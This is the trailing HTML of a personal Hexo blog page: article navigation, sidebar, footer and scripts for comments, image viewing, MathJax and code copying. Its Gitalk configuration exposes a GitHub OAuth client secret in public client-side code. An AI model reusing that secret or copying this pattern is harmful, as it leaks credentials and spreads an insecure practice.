        </div>
      </a>
    
    
      <a href="/2022/06/08/technology/github%E9%9D%9E%E5%B8%B8%E6%9C%89%E4%BB%B7%E5%80%BC%E7%9A%84%E9%A1%B9%E7%9B%AE1/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">github非常有价值的项目1</div>
      </a>
    
  </nav>

  
   
<div class="gitalk" id="gitalk-container"></div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.css">


<script src="https://cdn.jsdelivr.net/npm/gitalk@1.7.2/dist/gitalk.min.js"></script>


<script src="https://cdn.jsdelivr.net/npm/blueimp-md5@2.10.0/js/md5.min.js"></script>

<script type="text/javascript">
  var gitalk = new Gitalk({
    clientID: 'Ov23li39D7xcwiTHeGgk',
    clientSecret: '007da9b580d1c5627f38c2e4d6130837031c9261',
    repo: 'youngqqcn.github.io',
    owner: 'youngqqcn',
    admin: ['youngqqcn'],
    // id: location.pathname,      // Ensure uniqueness and length less than 50
    id: md5(location.pathname),
    distractionFreeMode: false,  // Facebook-like distraction free mode
    pagerDirection: 'last'
  })

  gitalk.render('gitalk-container')
</script>

     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2021-2025
        <i class="ri-heart-fill heart_icon"></i> youngqqcn
      </li>
    </ul>
    <ul>
        <!-- 感谢shenyu的ayer主题, by youngqqcn 2021-04-26-->
      <!-- <li>
        
        
        
        由 <a href="https://hexo.io" target="_blank">Hexo</a> 强力驱动
        <span class="division">|</span>
        主题 - <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li> -->
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.jpeg" alt="yqq&#39;s blog"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">友链</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories/%E7%94%9F%E6%B4%BB">生活</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories/%E6%8A%80%E6%9C%AF">技术</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories/%E8%AF%BB%E4%B9%A6">读书</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories/%E5%AD%A6%E4%B9%A0">学习</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories/%E6%97%85%E8%A1%8C">旅行</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories/%E7%BE%8E%E9%A3%9F">美食</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories/%E6%91%84%E5%BD%B1">摄影</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->
 <script type="text/x-mathjax-config">
  MathJax.Hub.Config({
      tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
  });

  MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for(i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
      }
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.6/unpacked/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script>
  var ayerConfig = {
    mathjax: true,
  };
</script>

<!-- Katex -->

<!-- busuanzi  -->

<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->
 
<script src="/js/clickBoom2.js"></script>
 
<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->

<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "neutral" });
  }
</script>


    
  </div>
</body>

</html>